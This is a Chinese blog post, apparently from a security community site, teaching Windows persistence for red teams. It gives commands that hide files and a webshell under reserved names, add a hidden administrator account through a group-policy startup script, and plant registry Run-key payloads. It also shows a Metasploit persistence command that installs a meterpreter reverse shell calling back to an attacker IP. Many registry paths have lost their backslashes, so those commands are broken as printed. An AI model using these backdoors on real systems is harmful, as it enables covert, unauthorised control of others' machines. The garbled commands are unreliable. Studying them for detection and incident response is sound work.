Windows 权限维持学习

本文仅用于技术研究学习，请遵守相关法律，禁止使用本文所提及的相关技术开展非法攻击行为，由于传播、利用本文所提供的信息而造成任何不良后果及损失，与本账号及作者无关。

关于无问社区

无问社区致力于打造一个面向于网络安全从业人员的技术综合服务社区，可免费获取安全技术资料，社区内技术资料知识面覆盖全面，功能丰富。

特色功能：划词解析、调取同类技术资料、基于推荐算法，为每一位用户量身定制专属技术资料。

无问社区-官网：http://wwlib.cn

无问社区站内阅读链接：

http://www.wwlib.cn/index.php/artread/artid/11756.html

0x00 windows 权限维持概述

红队行动中，在网络中获得最初的立足点是一项耗时的任务，因此，持久性是红队成功运作的关键，这将使团队能够专注于目标，而不会失去与指挥和控制服务器的通信。

权限维持机器：DMZ 机器（作为跳板），跨段关键节点

0x01 隐藏技巧

1. 真正 ”隐藏文件"

使用 attrib +s +a +h +r 命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。

attrib +s +a +h +r c:test

这样不管是否隐藏文件，此文件都不可见

取消：

attrib -s -a -h -r c:test

系统文件夹图标 1. 将文件名重命名为我的电脑.

{20D04FE0-3AEA-1069-A2D8-08002B30309D}

（这个是注册表里面的 clsid，打开过后也是我的电脑）

2. 其他 clsid

我的电脑 {20D04FE0-3AEA-1069-A2D8-08002B30309D}

我的文档 {450D8FBA-AD25-11D0-98A8-0800361B1103}

拨号网络 {992CFFA0-F557-101A-88EC-00DD010CCC48}

控制面板 {21EC2020-3AEA-1069-A2DD-08002B30309D}

计划任务 {D6277990-4C6A-11CF-8D87-00AA0060F5BF}

打印机 {2227A280-3AEA-1069-A2DE-08002B30309D}

记事本 {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}

网络邻居 {208D2C60-3AEA-1069-A2D7-08002B30309D}

回收站 {645FF040-5081-101B-9F08-00AA002F954E}

公文包 {85BBD920-42A0-1069-A2E4-08002B30309D}

字体 {BD84B380-8CA2-1069-AB1D-08000948F534}

Web 文件夹 {BDEADF00-C265-11d0-BCED-00A0C90AB50F}

畸形目录

只需要在目录名后面加两个点（也可以是多个点），畸形目录和 windows 版本有关联。不是所有版本通用

创建目录：

md a... ，

实际显示为 a..

复制文件：

copy file c:dira...file

url 访问：

/a.../file

删除目录：

rd /s /q a...

测试后发现好像在某些系统版本是可以访问目录的，但是图形化界面还是无法删除利用系统保留文件名创建图形化界面无法删除的 webshell，只能用命令行删除 Windows 下不能够以下面这些字样来命名文件 / 文件夹，包括：

aux/com1/com2/prn/con/nul

但是通过 cmd 下是可以创建、删除此类文件夹的，使用 copy 命令：

copy file .c:diraux.asp
del .c:diraux.asp
type .c:diraux.asp

. 是 Windows 下的特性，创建文件的时候加上了那访问的时候也必须加上

驱动级文件隐藏

驱动隐藏最典型的现象就是系统盘存在以下文件

xlkfs.dat

xlkfs.dll

xlkfs.ini

...

使用软件

Easy file locker

0x02 组策略

因为其极具隐蔽性，因此可以利用来做服务器后门。可以通过这个后门运行某些程序或者脚本，比如创建一个管理员用户

echo off
net user hack$ test168 /add
net localgroup administrator hack$ /add
exit

运行 ->gpedit.msc-> 计算机配置 ->Windows 设置 -> 脚本（启动 / 关机），组策略中的这个后门可以利用来运行脚本或者程序，嗅探管理员密码等

0x03 注册表 - regedit

metasploit 和 sharpersist 都提供了这种能力，在 Windows 登陆期间创建将执行任意负载的注册表的项。

Run: 该项下的键值即为开机启动项，每一次随着开机而启动，作为持久化后门

reg add "HKEYCURRENTUSERSoftwareMicrosoftWindowsCurrentVersionRun" /v
test /t REG_SZ /d "C:Program Files (x86)test.exe"
reg add "HKEYCURRENTUSERSoftwareMicrosoftWindowsCurrentVersionRunOnce"
/v test /t REG_SZ /d "C:Program Files (x86)test.exe"
reg add
"HKEYCURRENTUSERSoftwareMicrosoftWindowsCurrentVersionRunServices" /v
test /t REG_SZ /d "C:Program Files (x86)test.exe"
reg add
"HKEYCURRENTUSERSoftwareMicrosoftWindowsCurrentVersionRunServicesOnce"
/v test /t REG_SZ /d "C:Program Files (x86)test.exe"

说明：

/v 是指所选项下要添加的值名；

/ve 添加空白值名（无名称）；

/t regkey 数据类型，忽略则默认采用 REG_SZ（S：字符串类型，Z：以零字节结尾）

/d 要分配给添加的值名的数据，开机启动 C:Program Files (x86)1.py

/f 强行修改现有注册表项

cmd 把用户从用户组中删除（即使是管理员用户也需要单独属于 Administrator 组，不能同时属于其他用户组）：

net localgroup 用户组 用户名 /delete

如果已经获得提升的凭据（管理员和 system 权限），则最好使⽤本地计算机注册表位置，⽽不是当前⽤户，因为有效负载将在每次系统启动时执⾏，⽽与使⽤系统身份验证的⽤户⽆关。通常 HKEY_LOCAL_MACHINE 中的设置优先级要高于 HKEY_CURRENT_USER。此方法也需要用户单独属于 Administrator 组。

reg add "HKEYLOCALMACHINESoftwareMicrosoftWindowsCurrentVersionRun" /v
test /t REG_SZ /d "C:Program Files (x86)test.exe"
reg add "HKEYLOCALMACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce"
/v test /t REG_SZ /d "C:Program Files (x86)test.exe"
reg add
"HKEYLOCALMACHINESoftwareMicrosoftWindowsCurrentVersionRunServices" /v
test /t REG_SZ /d "C:Program Files (x86)test.exe"
reg add
"HKEYLOCALMACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesOnce"
/v test /t REG_SZ /d "C:Program Files (x86)test.exe"

另外两个注册表位置

允许红队人员通过执行任意有效负载或 DLL 来实现持久性，这些将在登陆期间执行，并且需要管理员级别的特权（此方法也需要用户单独属于 Administrator 组）。

reg add
"HKEYLOCALMACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceEx001"
/v Pentestlab /t REG_SZ /d "C:Program Files (x86)test.exe"
reg add
"HKEYLOCALMACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceEx001D
ep end" /v Pentestlab /t REG_SZ /d "C:Program Files (x86)test.dll"

msf 注册表 dll 注入权限维持

msf 中带有脚本和后期利用模块来通过注册表达到持久性，msf 脚本将以 vbs 脚本的形式创建一个有效负载，将负载拖放到磁盘上，并创建一个注册表项，该注册表项将在用户登陆期间运行该负载。

run persistence -U -P windows/meterpreter/reverse_tcp -i 5 -p 1234 -r 192.168.211.128

说明：

-U

-P

-i

-p

-r

执行结果说明：

C:UsersnathaAppDataLocalTempbuFUzcFJpNNFu.vbs
HKCUSoftwareMicrosoftWindowsCurrentVersionRunuoHiFnBHv

ThinkPHP常见框架漏洞复现分析

漏洞挖掘|从实战中学习漏洞挖掘与渗透测试流程

内网攻防-权限提升-Windows-系统配置错误提权

系统后门应急排查方法

windows下应急响应排查内容

加入交流群

点“阅读原文”，访问无问社区

长亭百川云 - 文章详情

长亭百川云